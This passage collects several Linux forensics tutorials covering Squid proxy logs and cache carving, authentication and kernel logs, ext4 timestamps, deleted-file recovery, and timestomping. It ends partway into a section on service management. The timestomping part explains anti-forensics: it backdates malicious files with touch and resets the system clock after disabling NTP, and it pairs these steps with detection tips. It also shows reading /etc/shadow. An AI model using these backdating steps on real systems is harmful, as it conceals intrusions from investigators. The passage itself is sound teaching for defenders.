I’m going to walk you through how to analyze proxy logs—what tools you can use, what patterns to look for, and where to dig deeper—but keep in mind, every investigation is different, so while I’ll show you the process, the real analysis is something you will need to drive based on your case. Let’s talk about something that’s often sitting quietly in the background of many networks but plays a huge role when an investigation kicks off: Proxies . Whether you’re a forensic analyst, an incident responder, or just someone interested in how network traffic is monitored, proxies are your silent allies. 🧭 First Things First: What Does a Proxy Even Do? Think of a proxy like a middleman between users and the internet . Every time a user accesses a website, the request goes through the proxy first. This is awesome for: Monitoring user activity : Who went where, when, and what happened. Enforcing policies : Blocking sketchy sites or filtering content. Caching : Saving bandwidth by storing frequently accessed content locally. And the best part? Proxies keep logs . Gold mines for investigations. 🔍 Why Proxy Logs Are a Big Deal in Forensics When you're dealing with a potential breach or malware incident, one of the first questions is: Who visited what site? Now, imagine going machine-by-machine trying to find that out… 😫 That’s where proxy logs shine: ✅ Speed up investigations ✅ Quickly identify systems reaching out to malicious URLs ✅ Track timelines without touching each device individually And even better— some proxies cache content . So even if malware was downloaded and deleted from a device, the proxy might still have a copy in its cache. Lifesaver. 🐙 Enter Squid Proxy – A Favorite Squid is a widely used HTTP proxy server. If you’ve worked in enterprise environments, chances are you’ve run into it. 🧾 Key Squid File Paths: Config file: /etc/squid/squid.conf Logs: /var/log/squid/* Cache: /var/spool/squid/ These are your go-to places when digging into evidence. ----------------------------------------------------------------------------------------------------------- 📈 What You Can Learn from Squid Logs Squid logs tell you things like: Field Example What It Means UNIX Timestamp 1608838269.433 Date/time of the request Response Time 531 Time taken to respond (in ms) Client IP 192.168.10.10 Who made the request Cache/HTTP Status TCP_MISS/200 Was it cached? Was it successful? Reply Size 17746 Size of response HTTP Method GET Type of request URL https://www.cyberengage.org/ Site accessed Source Server DIRECT/192.168.0.0 Origin server IP MIME Type text/html Content type returned So from one single log line, you can know who accessed what , when , and how the proxy handled it. 🧠 Bonus Info: Cache Status Codes That Help You Analyze TCP_HIT: Content served from cache TCP_MISS: Had to fetch from the internet TCP_REFRESH_HIT: Cached content was revalidated TCP_DENIED: Blocked by proxy rules This gives you an idea of how users interact with sites and how often content is being reused. ----------------------------------------------------------------------------------------------------------- ⚠️ Default Squid Logs Are Good… But Not Perfect Here’s the catch: By default, Squid doesn’t log everything you might want during an investigation. For example: 🚫 No User-Agent 🚫 No Referer 🚫 Query strings (like ?user=admin&pass=1234) are stripped by default This can hurt if malware uses obfuscated URLs or redirects. But don’t worry—Squid is super customizable. 
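Before changing anything, it’s worth checking what your Squid instance is currently logging — a quick sketch, assuming the default Debian-style config path:
grep -E '^(logformat|access_log|strip_query_terms)' /etc/squid/squid.conf
If nothing comes back, the proxy is running on the defaults described above.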
🔧 How to Improve Squid Logs for Better Visibility You can change the Squid log format to include things like the User-Agent and Referer. ✅ Example Configuration (Put this in squid.conf): logformat combined %>a %[ui %[un [%tl] "%rm %ru HTTP/%rv" %>Hs %<st "%{Referer}>h" "%{User-Agent}>h" %Ss:%Sh %>a: Client IP %tl: Local time (human-readable) %rm %ru: HTTP method and URL %>Hs: Status code (200, 404, etc.) %<st: Reply size sent to the client %{Referer}>h: Page that referred the user %{User-Agent}>h: Browser or software used %Ss:%Sh: Cache and hierarchy status (Don’t forget to point your access log at the new format with: access_log /var/log/squid/access.log combined) Boom. Now your logs are a forensic analyst’s dream. 🔍 Sample Human-Readable Log Entry 192.168.10.10 - - [30/Apr/2025:00:00:00 +0000] "GET https://www.cyberengage.org/...js HTTP/1.1" 200 38986 "https://www.cyberengage11.org/..." "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0)... Firefox/47.0" TCP_MISS:HIER_DIRECT From this one line, we can tell: The user at IP 192.168.10.10 accessed a JavaScript file The browser was Firefox on Windows The request wasn't cached (TCP_MISS) That’s a full story from one log entry. ----------------------------------------------------------------------------------------------------------- 🛑 But Wait—A Word of Caution! Want to log query strings or detailed headers? You must change your config. # In /etc/squid/squid.conf strip_query_terms off ⚠️ Warning: This could capture sensitive data (like usernames/passwords in URLs), so make sure you’re authorized to log this. Respect privacy policies. ----------------------------------------------------------------------------------------------------------- Alright, let’s get real. When you're looking at a Squid proxy for investigation, it can look like a mess of logs, cache files, and cryptic timestamps. But trust me, with the right tools and techniques, you'll be digging up web activity and cached secrets like a forensic wizard. 🛠️ Let’s Begin with a Tool – Calamaris So first up, there's this pretty slick tool called Calamaris – great for getting summaries out of Squid logs. It's not fancy-looking, but it's efficient, and sometimes that's all you need. You can check out the tool here: Calamaris Official Page To install it inside your WSL (Windows Subsystem for Linux), just run: sudo apt install calamaris Boom. Installed. Now let’s analyze a Squid access log: cat /mnt/c/Users/Akash\'s/Downloads/proxy/proxy/proxy2/squid/squid/access.log | calamaris -a And just like that, it spits out a clean summary. Requests, clients, status codes—it’s all there. This makes the initial review of a log super simple. 🔎 BUT... there’s a catch. If your Squid logs use a custom format (which happens often in real environments), Calamaris might fumble. So if your output looks weird or incomplete, don’t panic—we’ll have to get our hands dirty and analyze stuff manually. Let’s keep going. 🕰️ Dealing with Timestamps – From Unix to Human By default, Squid logs come with UNIX epoch timestamps. Unless you're a robot, they aren't human-friendly. But converting them is easy. Use this: date -u -d @1742462110.226 That -u gives you UTC format (ideal for timeline consistency). Now you're thinking—"Akash, am I supposed to convert each timestamp manually?" Heck no. Here's a one-liner that’ll do the job for the entire log file: sudo cat /mnt/c/Users/Akash\'s/Downloads/proxy/proxy2/squid/squid/access.log | awk '{$1=strftime("%F %T", $1, 1); print $0}' > /mnt/c/Users/Akash\'s/Downloads/readable.txt This outputs a clean, readable version of your log into readable.txt.
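Once the timestamps are readable, carving out a window of interest is just a string comparison in awk — a small sketch with hypothetical dates (this works because the converted timestamps sort lexicographically):
awk '($1" "$2) >= "2025-03-20 00:00:00" && ($1" "$2) <= "2025-03-20 23:59:59"' readable.txt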
📂 Important Files to Collect in a Squid Forensic Investigation While you’re getting into the logs, don’t forget to grab these essentials: /etc/squid/squid.conf – Config file that tells you how the proxy works, where logs are stored, ACLs, cache settings, etc. /var/log/squid/access.log – The main access log (you’ll be here a lot) /var/log/squid/referer.log, /useragent.log, /cache.log, /store.log – All useful for understanding context like who clicked what, what browser they used, cache hits/misses, etc. 🔍 Starting Your Investigation – Log Hunting Let’s say you’re investigating activity around google.com. Start basic: grep google.com access.log Now you can narrow it down further. Want to see only GET or POST requests? grep "GET.*google.com" access.log Start building a timeline from here—this is your story-building phase in an incident investigation. ----------------------------------------------------------------------------------------------------------- 💾 Let’s Talk About Cache – One of the Juiciest Parts Squid caches web objects to speed things up. This means files, URLs, images, even docs might be sitting there waiting to be carved out. Default cache path: /var/spool/squid/ Here, cached files are stored in a structured format like: /var/spool/squid/00/05/000005F4 If you want to inspect these: grep -railF www.google.com /var/spool/squid/ Flags explained: -r: Recursively search -a: Treat files as ASCII -i: Case-insensitive -l: Show filenames only -F: Literal search (no regex overhead) Then use strings to dig deeper into the cache object: strings -n 10 /var/spool/squid/00/05/000005F4 | grep ^http | head -n 1 This gives you clean URLs that were cached. ----------------------------------------------------------------------------------------------------------- 📤 Extracting Actual Files from Cache Let’s say you found a cached .doc file and want to pull it out. Here's how: Find it: grep -railF file.doc ./ Example output: 00/0e/00000E20 Examine it: strings -n 10 00/0e/00000E20 Check for headers like: Content-Type: Cache-Control: Expires: This tells you what’s inside the file and why it was cached. Carve the file: Use a hex editor like ghex to open the file and locate the 0x0D0A0D0A byte pattern (that’s the HTTP header/body separator). Delete everything up to and including this pattern and save the result to a new file. Identify the file type: file carved_output If it says something like “Microsoft Word Document,” you’ve got your artifact extracted. Mission success! 💥 ----------------------------------------------------------------------------------------------------------- 🔗 Extra Resources You’ll Love Want to keep up with new tools for analyzing Squid? Bookmark this: 👉 Squid Log Analysis Tools List (Official) And don’t forget to explore another gem: 👉 SquidView Tool – Neat for interactive visual log analysis. ----------------------------------------------------------------------------------------------------------- 🧠 Final Thought Log and cache analysis in Squid isn't just about reading boring log lines. It's storytelling through network artifacts. From timestamps to URLs, from GETs to cached DOC files—every bit tells you something. The trick is not just knowing what to look for—but knowing how to get it out. If you're starting your journey with Squid forensics, this is your friendly roadmap. And hey, the more you do it, the more patterns you start seeing. It becomes second nature. ---------------------------------------------Dean----------------------------------------------------------
- Understanding Linux: Kernel Logs, Syslogs, Authentication Logs, and User Management
Alright, let’s break down Linux user management, authentication, and logging in a way that actually makes sense, especially if you’ve been on both Windows and Linux systems. 🔑 1. Unique Identifiers in Linux vs Windows First off, let’s talk about how users are identified: Windows uses SIDs (Security Identifiers) — long strings like S-1-5-21-... to uniquely identify users. Linux, on the other hand, uses UIDs (User IDs) for users and GIDs (Group IDs) for groups. 👉 Quick Tip: Regular user accounts start from UID 1000 and above. Anything below 1000 is usually a system or service account (like daemon, syslog, etc.). 📂 2. Where Is User Info Stored in Linux? 🧾 /etc/passwd This file holds basic user info: username, UID, GID, home directory, and shell (like /bin/bash or /usr/sbin/nologin). cat /etc/passwd You'll see entries like: akash:x:1001:1001:Akash,,,:/home/akash:/bin/bash 🔐 /etc/shadow This one is where the actual (hashed) passwords are stored — not in /etc/passwd. It’s restricted to root for a reason. sudo cat /etc/shadow You’ll notice hashed passwords that look something like this: akash:$6$randomsalt$verylonghashedpassword:19428:0:99999:7::: That $6$ means it’s hashed using SHA-512. Other common password hashing algorithms in Linux: MD5, Blowfish, SHA-256, and SHA-512. All of these use salting and multiple hashing rounds for added security. 👥 3. Managing Users in Linux (Commands You’ll Actually Use) Here are the most common commands: Command What It Does useradd Add a new user userdel Remove a user usermod Modify user properties chsh Change a user’s default shell passwd Set or change a user's password All of this ties into how Linux handles access and sessions. 🛡️ 4. How Linux Handles Authentication (Thanks to PAM) PAM stands for Pluggable Authentication Modules — and it’s the brain behind how Linux checks your credentials. 🗂️ Where are the PAM config files? /etc/pam.d/ : Main directory for PAM config files for individual services (like sshd, login, sudo, etc.) /etc/security/access.conf : You can use this to allow or deny users based on IP, group, etc. Example: -:akash:ALL EXCEPT 192.168.1.100 This means Akash can only log in from the IP 192.168.1.100. 🧩 PAM Modules Location These are .so files (shared object libraries) that do the heavy lifting. RHEL-based distros: /usr/lib64/security/ Debian-based distros: /usr/lib/x86_64-linux-gnu/security/ Think of them like Linux’s version of Windows DLLs but for authentication logic. 🔄 How PAM Authentication Works (Step by Step) User enters credentials (username + password). System loads PAM config from /etc/pam.d/*. Relevant modules get called from /usr/lib/.... Password is compared with the hash in /etc/shadow. If valid, session gets started. Authentication logs are written — usually in /var/log/auth.log or /var/log/secure. Access is granted or denied. Simple but powerful. --------------------------------------------------------------------------------------- 📜 5. Logging – Where to Look 🗂️ Where Does Linux Log Authentication Stuff? Linux keeps logs under the /var/log/ directory — that’s the central place where you’ll find all sorts of system and user-related logs. 1. /var/log/auth.log (Debian/Ubuntu systems) This is your go-to file when investigating: Logins via terminal, SSH, or sudo Session starts/stops Authentication failures and successes Use tail -f /var/log/auth.log to monitor real-time logins. For older, compressed logs, use: zcat /var/log/auth.log.1.gz
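For example, a quick brute-force triage one-liner — count failed SSH password attempts by source IP (field positions can shift slightly between distros, so treat this as a sketch and eyeball the raw lines first):
grep 'Failed password' /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn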
Also, fun fact: cron job logs land here too, because cron has to authenticate users before running scheduled tasks. 2. /var/log/secure (Red Hat/CentOS/Fedora systems) Same purpose as auth.log but without cron logs. So if you’re hunting down brute-force attempts or failed SSH logins on RHEL or CentOS, this is your place. 3. /var/log/faillog This one specifically logs failed login attempts, but here’s the twist: On Ubuntu/Debian, it’s there, but only if you configure pam_faillock. On RHEL-based systems, it’s often not enabled by default. Use faillog -a to check all failed attempts. 4. /var/log/lastlog Want to know when a user last logged in? Boom — this file’s got you covered. Run lastlog -u akash to check last login time for user akash. Neat for checking dormant accounts or for basic auditing. 5. /var/log/btmp This file tracks failed login attempts, but it’s in binary format — so don’t try to cat it like a text file. Use lastb or lastb -f /var/log/btmp to view it cleanly. 6. /var/log/wtmp It logs all login/logout events, system reboots, and shutdowns. Run last to read it. Or, for a forensic dump from a dead system: last -f /mnt/disk/var/log/wtmp 7. /run/utmp This file is more “live.” It tracks users currently logged in. Use who or w to view who's online right now. 🔍 How Long Are Logs Kept? Linux usually keeps logs for 4 weeks by default, rotating them weekly. Older logs get compressed (you’ll see .gz files). So for deeper dives: Use zcat or zless to view archived logs Use strings, hexdump, or a hex editor to read binary logs like btmp, wtmp, or utmp in raw forensics scenarios 🧪 Quick Command Recap Command Purpose last Shows logins/logouts from /var/log/wtmp lastb Shows failed logins from /var/log/btmp faillog -a View all failed login attempts who / w Shows currently logged-in users (from utmp) lastlog -u user Shows last login info from lastlog 🧠 Bonus: How Syslog and Kernel Logging Works in Linux Let’s talk Syslog — the backbone of Linux logging. Syslog isn’t a file — it’s a standard protocol used by system processes to send log messages to a log server (or local file). It’s used across services, from SSH to cron, and it categorizes logs by: Facility (like auth, kernel, daemon) Severity (info, warning, error, critical) Common Syslog Implementations: rsyslog (most common these days) syslog-ng journald (used with systemd) 🗂️ Key System Log Files 1. /var/log/syslog (Ubuntu/Debian) This is like a catch-all system log. You’ll find: Kernel messages App-level logs Cron logs Hardware issues It’s super useful when you’re not sure what exactly went wrong but want a timeline of everything. Use tail -f /var/log/syslog or grep through it to find events. 2. /var/log/messages (RHEL/CentOS/Fedora) Think of this as the Fedora-flavored syslog. It logs similar data — services, kernel messages, application errors — but it’s the default log file for those distros. Want to Go Pro Mode? You can even forward logs to a central log server using rsyslog or syslog-ng. Perfect for SIEM integration or enterprise setups. 🚨 Tip: Watch Those Binary Logs Files like wtmp, btmp, and utmp are not plain-text, so don’t expect to read them with cat. Either use the right commands (last, lastb, who, etc.) or open them in a hex editor when you’re in full forensic mode. --------------------------------------------------------------------------------------- Let’s talk about something super important but often overlooked — kernel logs in Linux.
These logs are goldmines when it comes to diagnosing system-level problems like driver issues, boot errors, or hardware failures. But if you're like most people, kernel logging might feel a bit messy because of the variety of tools and file paths involved across distros. So, let's break it all down in plain language. 🧠 First Things First — What’s dmesg All About? The dmesg command is your go-to tool when you want to see what the Linux kernel has been up to — especially right after booting. It shows stuff like: Hardware detection Driver loading Device initialization (like USBs, disks, network interfaces) Boot-time errors Basically, if something is going wrong at the very core of your OS — this is where you'll see the first red flags. 🔧 How to Use It? Just pop open a terminal and run: dmesg You’ll see a big wall of text. You can pipe it to less or grep for easier viewing: dmesg | grep -i error Now here’s the catch: this output comes from the kernel ring buffer — which is in memory. That means once the system reboots, poof — it’s gone unless you’ve saved it. 📁 But Wait — Where Is This Stuff Saved? On some distros, it actually is saved! 🗂️ /var/log/dmesg (Only on Some Systems) This file captures the output of dmesg from the last boot and stores it permanently. You can just run: less /var/log/dmesg But don’t count on it being available on all systems. For example: Debian/Ubuntu: You’re likely to find it. Fedora/RHEL/Rocky: Nope. They use journald instead (more on that in a sec). 📚 Enter /var/log/kern.log — The Persistent Hero Now this one’s interesting. The kern.log file contains all kernel messages — just like dmesg — but it sticks around even after rebooting. That means you can go back and check what the kernel was doing a week ago if your system started acting weird after an update or new hardware installation. View it like this: less /var/log/kern.log 🕒 Bonus: Time Stamps Unlike the raw dmesg output that shows uptime seconds (like [ 3.421546]), the messages in kern.log come with real human-readable timestamps , making it way easier to match with user events. 🧰 What About Fedora, RHEL, Rocky Linux? Alright, now let’s talk Fedora-style distros . They’ve moved away from traditional log files and now rely heavily on systemd's journald service . So files like /var/log/kern.log or /var/log/dmesg? You won't find them here. Instead, everything is logged into the system journal . ✅ How to View Kernel Logs? journalctl -k That gives you only kernel logs from the journal. Super clean, super easy. You can also use filters like: journalctl -k --since "2 days ago" --------------------------------------------------------------------------------------- 💾 Persistent vs Non-Persistent Logs (This Is Crucial!) Systemd-based distros can either store logs in memory (volatile) or on disk (persistent). Whether or not your logs survive reboot depends on how journald is set up. If logs are stored in /var/log/journal, they’re persistent . If not, and only in /run/log/journal, they’re gone after reboot . So if you're doing forensics on a deadbox, you’d better hope /var/log/journal exists. --------------------------------------------------------------------------------------- 💀 Deadbox Log Hunting Tips If you're working on a dead system and trying to dig into what happened before it went down: Mount the disk using a live CD or forensic OS. Navigate to /var/log/journal/ if it exists. Use journalctl --directory=/mount/path/var/log/journal to view the logs. If nothing's there? 
You're kinda outta luck unless you've got other artifacts like /var/crash/, old syslog exports, or even swap memory to analyze. --------------------------------------------------------------------------------------- 🔚 Final Thoughts Whether you’re on a live system , doing forensics , or trying to fix a misbehaving server, don’t forget: Logs don’t lie — you just need to know where they’re hiding. --------------------------------------Dean------------------------------------------
- Linux File System Analysis and Linux File Recovery: EXT2/3/4 Techniques Using Debugfs, Ext4magic & Sleuth Kit
When you're digging into Linux systems, especially during live forensics or incident response, understanding file system behavior is crucial. The ext4 file system is commonly used, and knowing how to read file timestamps properly can give you a solid edge in an investigation. Let's break it down in a very real-world way. 🔹 1. Basic ls -l — Let’s Start Simple When you run: ls -l You get a list of files along with a timestamp. That timestamp? It’s the modification time (mtime). That’s the default. If you're like me and wondering, "What if I want to see when a file was last accessed or changed in metadata?", then you’ve got options. 🔹 2. Customize the Time Display (atime, ctime, etc.) Use --time= to get the info you care about: ls -l --time=atime # Shows last access time ls -l --time=ctime # Shows inode change time Note: ctime is not "creation time" (confusing, I know). It's the time when metadata (permissions, ownership, etc.) changed. Want to know what time options ls supports? Just check: man ls 🔹 3. Can We See File Creation Time on ext4? Now here’s where it gets interesting — and a bit annoying. ext4 can support birth time (aka creation time), but not all Linux distros expose it by default via normal tools. Some versions of ls, stat, or even the filesystem itself may not record it. So how do we go deeper? That’s where the magic of debugfs comes in. 🔹 4. stat Command — Detailed File Info Quick and handy: stat <filename> You’ll see Access, Modify, and Change times — and sometimes the creation (Birth) time as well. But again, sometimes no creation time. Sad life 😅. 🔹 5. Using debugfs to Dig Deeper (Finding Birth Time or Inode Info) When you’re doing live response and the system won’t give you birth/creation time using stat, this is your go-to: sudo debugfs -R "stat <filename>" /dev/<device> ⚠️ You need the device name where the file system is mounted. How to find the device name? Use: df or df -h Sometimes you might find something like /dev/sdc or /dev/mapper/ubuntu--vg-root if LVM is used. Also check /etc/fstab: cat /etc/fstab This shows all persistently mounted devices, useful when the system uses LVM or /dev/mapper. Sometimes it’ll look like: /dev/disk/by-id/dm-uuid-LVM-... ✅ Example Use Case: Let’s say I want to check creation time for /var/log/syslog. Run: sudo debugfs -R "stat /var/log/syslog" /dev/sdc Boom! You'll now see: Inode Size Access time Modify time Change time Creation time (if available!) This is not the same stat command we used earlier. This one is a debugfs internal command. 🔹 6. Using debugfs in Interactive Mode You can drop directly into debugfs with: sudo debugfs /dev/sdc Once inside, you’re in a shell-like environment. Just run: stat /home/akashpatel/arkme No need for -R here — you're already inside. 🔹 7. Want Inode Number First? Sometimes, you want to grab the inode of a file before using debugfs. You can do this: ls -i /home/akashpatel/arkme Now if you’ve got an inode like 123456, and you're inside debugfs, just run: stat <123456> Or even: cat <123456> (Yeah, cat also works in debugfs!) 🔹 Pro Tips: Always double-check you’re using the right device — especially with forensic images or LVM setups. debugfs is super powerful, but read-only usage is safest in live forensics (avoid writing to the file system!). If you get errors running debugfs, make sure the device isn't actively in use or try accessing a mounted image instead.
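One more shortcut worth knowing before the recap: recent GNU coreutils versions can ask the kernel for birth time directly (via statx), so plain stat may already show it. The %w format prints the birth time, or just - if the filesystem or kernel doesn’t expose it:
stat -c '%w' /var/log/syslog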
In a nutshell: Command What It Shows ls -l mtime (default) ls -l --time=atime Access time ls -l --time=ctime Metadata change time stat <filename> mtime, atime, ctime, crtime (sometimes) debugfs -R "stat <filename>" /dev/... Shows all 4 timestamps including birth time (if supported) debugfs (interactive) Explore with inode numbers, use stat, cat, etc. ------------------------------------------------------------------------------------------------------------- Let’s suppose you accidentally delete a super important file on a Linux system running an ext2/ext3/ext4 filesystem. The panic hits, right? But don’t worry—I’ll walk you through how to recover it using a mix of tools like debugfs, ext4magic, and Sleuth Kit. 🧰 1. Recover Deleted Files Using debugfs (Works Best on EXT2) If the filesystem is ext2, then debugfs is your best buddy. It's got this neat command called lsdel that lists recently deleted files. 🔧 Basic Workflow Launch debugfs: sudo debugfs /dev/sdX Replace /dev/sdX with your actual device (e.g., /dev/sdc). List deleted files: lsdel Or: list_deleted_inodes You’ll get inode numbers of deleted files. Pick the one you want. View inode details: stat <inode> Preview content (yes, you can peek!): cat <inode> Recover the file: dump <inode> /desired/output/path/filename 💡 Heads-up: This method is mostly for ext2 filesystems. Why? Because ext3 and ext4 clean up the data blocks after deletion, which makes recovery harder directly. ------------------------------------------------------------------------------------------------------------- 🧠 2. Recovery on EXT3 and EXT4 (Using Journal + ext4magic Tool) Now here’s where it gets a bit more interesting. With ext3/ext4, things aren’t that simple because once a file is deleted, the inode is wiped out. But all hope isn’t lost—we go after the journal. 🔒 Journal’s Inode is Always 8 Yup. To grab the journal: debugfs /dev/sdc dump <8> /path/to/save/journal.dump 🚀 Use ext4magic for Real Recovery This tool is specially made to deal with journal-based recovery. Install it if you haven’t: sudo apt install ext4magic 🛠️ Basic Command: sudo ext4magic /dev/sdc -j /path/to/journal.dump -m -d /path/to/recovery_folder Flags explained: -j: Path to journal dump file -m: Recover ALL deleted files -d: Where to store recovered files -a or -b: Time-based filtering (after/before a specific time) 🎯 Example: Recover files deleted in the last 6 hours ext4magic /dev/sdc -a "$(date -d "-6 hours" +%s)" -j journal.dump -m -d ./recovered (Swap "-6 hours" for "-7 days" or any other window you need.) 💬 This gives you super fine control over what to recover. It’s way better than randomly guessing. ------------------------------------------------------------------------------------------------------------- 🔍 3. Sleuth Kit Magic – Inspect and Recover Like a Forensics Expert If you’re digging into a disk image, maybe from a compromised system or raw forensic capture, you’ll want to mount it and go deeper. 🧱 Mount the Image (Linux or WSL) sudo mkdir /mnt/test sudo mount -o ro,loop /path/to/linux.raw /mnt/test Now run: df Note down the mounted device name (e.g., /dev/loop0 or /dev/sdc). 🔎 Key Sleuth Kit Commands 1. fsstat – Filesystem Overview sudo fsstat /dev/sdc 2. fls – List Deleted Files (and More!) sudo fls -r -d -p /dev/sdc -r: Recursive -d: Deleted entries -p: Show full path 3. istat – Inode Metadata sudo istat /dev/sdc <inode> 4. icat – View File Content by Inode sudo icat /dev/sdc <inode> Perfect for checking the content of deleted files even if they don’t show up in the normal file tree.
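Putting fls and icat together — a minimal end-to-end recovery sketch (the filename and inode 123456 are hypothetical; take the real inode number from your fls output):
sudo fls -r -d /dev/sdc | grep report.doc
sudo icat /dev/sdc 123456 > recovered_report.doc
file recovered_report.doc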
🌀 Filesystem Journal Analysis with Sleuth Kit Sometimes, you want to peek into journal entries directly. Here’s how: 1. jls – List Journal Blocks sudo jls /dev/sdc | more 2. jcat – View Journal Block Content sudo jcat /dev/sdc <block-number> This is raw, low-level stuff—but crucial when traditional recovery methods fall short. ------------------------------------------------------------------------------------------------------------- 📦 Bonus: File Carving with photorec If you’re like “Just give me all the lost files!”, then photorec is your hero. Install it: sudo apt install testdisk Run it: sudo photorec Just point it to your image or device, choose the file types you want to recover, and it does the rest. It’ll carve out all files it finds—even if directory info is gone. (Very simple—just follow the prompts it shows.) 🔍 Final Tip: Search Within Recovered Files Once you recover everything, you might want to search for a specific string, like an IP address or username: grep -Rail "192.168.1.10" ./recovered The a in -Rail treats binary files as text, which is super helpful during deep dives. ✅ Wrapping Up So, whether you’re on a forensic case or just accidentally nuked your presentation file, these tools have your back. Just remember: Use debugfs for ext2. Use ext4magic + journal for ext3/ext4. Use Sleuth Kit for image-based investigation. And photorec when you’re ready to say “Recover ALL the things!” -------------------------------------Dean---------------------------------------------------
- Timestomping in Linux: Techniques, Detection, and Forensic Insights
------------------------------------------------------------------------------------------------------ Before we dive into timestomping on Linux, a quick note: I've already written a detailed article on timestomping in Windows, where I covered what it is, how attackers use it, and most importantly—how to detect it effectively. If you're interested in understanding Windows-based timestomp techniques and detection strategies, make sure to check out the article linked below: 👉 https://www.cyberengage.org/post/anti-forensics-timestomping Now, let’s explore how timestomping works on Linux systems and what you can do to uncover such activity. ------------------------------------------------------------------------------------------------------ Let’s talk about something that often flies under the radar in Linux investigations— timestomping. If you’re into forensics or incident response, you’ve probably come across files where the timestamps just don’t seem right. Maybe a malicious script claims it was modified months before the attack even happened. Suspicious, right? That’s timestomping in action. 🔧 So, What Exactly Is Timestomping? Timestomping is a sneaky little trick attackers use to manipulate file timestamps in order to hide their activities. Basically, they change the "last modified," "last accessed," or even "created" dates of files, so things don’t look out of place during an investigation. Here are the four main timestamps you’ll see in Linux: atime – last time the file was accessed mtime – last time the content was modified ctime – last time metadata (like permissions) changed crtime – file creation time (only visible on some filesystems like ext4, and not easily accessible) The goal is simple: blend in. If the file looks like it’s been sitting around for months, maybe you won’t look at it twice. 🛠️ The Classic Way: Using touch in Linux The most common and dead-simple way to timestomp in Linux is with the touch command. 🧪 Basic Syntax: touch -t [YYYYMMDDhhmm.ss] file 🎯 Some Practical Examples: Set a custom access & modification time: touch -t 202501010830.30 malicious.sh Change only the access time: touch -a -t 202501010101.01 report.log Change only the modification time: touch -m -t 202501010101.01 report.log ❗ Important Note: touch cannot change ctime or crtime. That’s metadata Linux protects more tightly. ------------------------------------------------------------------------------------------------------------- 🧠 Pro Trick: Copy Timestamps from Another File Want to make one file mimic another? touch -r /home/akash/legitfile suspiciousfile Now suspiciousfile will have the same access and modification times as legitfile. Handy for blending in! 👀 But... Can We Detect This? Yes. Even though timestomping is subtle, there are a few tells if you know what to look for. 🕵️‍♀️ 1. Subsecond Precision = 0? Run stat on the file: stat suspiciousfile If you see nanoseconds like .000000000, it might’ve been altered using touch—since manual timestamps usually don’t include fine-grained precision.
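To sweep a whole directory instead of checking files one by one, compare the nanosecond fields in bulk — a rough heuristic only, since some archivers and package managers also write whole-second timestamps:
stat -c '%n %y' /tmp/* | grep '\.000000000'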
----------------------------------------------------------------------------------------------------------- ⏳ System Time Manipulation: Another Sneaky Method Here’s another trick some attackers use—they change the system clock to backdate files. 🧪 How it Works: Turn off NTP (time syncing): sudo timedatectl set-ntp false Set a fake date/time: sudo date -s "1999-01-01 12:00:00" Create or drop your malicious files: touch payload.sh Restore the actual time: sudo timedatectl set-ntp true Now those files look like they were created in 1999—even though they were dropped minutes ago. 🔍 Real-World Detection Tips Here’s how we can catch these kinds of timestamp games: 📋 1. Command Monitoring Keep an eye on suspicious commands in your logs: touch -t touch -r date -s timedatectl hwclock 🧭 2. Timeline Inconsistencies Does a file’s mtime predate surrounding system events? Is ctime suspiciously newer than atime/mtime? Are there clusters of files all modified at the same weird timestamp? Use stat to dig into these or check timelines with forensic tools (more on that below). 🛠️ Forensic Tools That Can Help Here are some tools I often use when digging into possible timestomping: auditd – Can log file events and command execution (like touch, date) Sysmon for Linux – A great way to track suspicious process activity Plaso / log2timeline – My go-to for creating timelines and spotting weird timestamp gaps Velociraptor – Awesome for live hunting across multiple systems Eric Zimmerman's Tools – These are more for Windows, but worth mentioning if you’re working across platforms or with NTFS images 🔚 Final Thoughts Timestomping isn’t flashy—but it’s effective. That’s what makes it dangerous. A single altered timestamp can throw off your entire investigation if you’re not paying attention. But once you know what to look for—whether it's zeroed-out nanoseconds, unusual ctime, or oddly-timed files—you can start to see through the smoke and mirrors. Stay curious, stay forensic. 🕵️‍♂️ ------------------------------------------------------------Dean--------------------------------------------
- Understanding Linux Service Management Systems and Persistence Mechanisms in System Compromise
Before I start, I have already touched on persistence mechanisms in the article (Exploring Linux Attack Vectors: How Cybercriminals Compromise Linux Servers). If you want, you can check it out — link below: https://www.cyberengage.org/post/exploring-linux-attack-vectors-how-cybercriminals-compromise-linux-servers --------------------------------------------------------------------------------------------------------- Understanding init.d and systemd Service management in Linux has evolved significantly over the years, transitioning from traditional init.d scripts to the more modern systemd system. Both play crucial roles in starting, stopping, and managing background services (daemons), but they differ greatly in functionality, design, and usability. init.d: The Traditional System The init.d system has historically been the backbone of Linux service management. It consists of shell scripts stored in the /etc/init.d directory, each designed to control the lifecycle of a specific service. Common Commands Service management through init.d typically involves: start – Launch the service stop – Terminate the service restart – Stop and start the service again status – Check if the service is running Limitations Despite being widely used for years, init.d has several limitations: Lack of standardization: Script behaviors can vary widely No built-in dependency handling: Scripts must manually ensure other services are available Slower boot times due to serial service initialization Runlevels Runlevels define the state of the machine and what services should be running: 0 – Halt 1 – Single user mode 2 – Multi-user, no network 3 – Multi-user with networking 4 – User-defined 5 – Multi-user with GUI 6 – Reboot Management Tools Depending on the Linux distribution: Debian-based systems: Use update-rc.d to manage services Fedora/RedHat-based systems: Use chkconfig for the same purpose Script Location /etc/init.d – Main location for service scripts systemd: The Modern Standard Introduced in 2010, systemd was designed to overcome the shortcomings of traditional init systems. Although initially controversial, it has since become the default service manager in most major Linux distributions. Advantages Parallelized startup for faster boot times Dependency management between services Integrated logging through the systemd-journald service Standardized unit files replace disparate shell scripts Unit Files Instead of shell scripts, systemd uses declarative unit files to define how services should behave. These files can be of different types, such as: *.service – Defines a system service *.socket – Socket activation *.target – Grouping units for specific states (like runlevels) Unit File Locations /etc/systemd/system/ – Local overrides and custom service files /lib/systemd/system/ – Package-installed units (symlinked to /usr/lib/systemd/system on some distros) /usr/lib/systemd/system/ – Units installed by the operating system --------------------------------------------------------------------------------------------------------- systemd Timers vs Cron Jobs When it comes to establishing persistence on a Linux system, attackers and administrators alike have a range of tools at their disposal. Two commonly used scheduling mechanisms are systemd timers and cron jobs. Both serve the purpose of executing tasks at predefined intervals, but they differ in structure, control, and usage. Let’s take a closer look at each.
---------------------------------------------------------------------------------------------------------
systemd Timers vs Cron Jobs
When it comes to establishing persistence on a Linux system, attackers and administrators alike have a range of tools at their disposal. Two commonly used scheduling mechanisms are systemd timers and cron jobs. Both serve the purpose of executing tasks at predefined intervals, but they differ in structure, control, and usage. Let's take a closer look at each.

1. systemd Timers
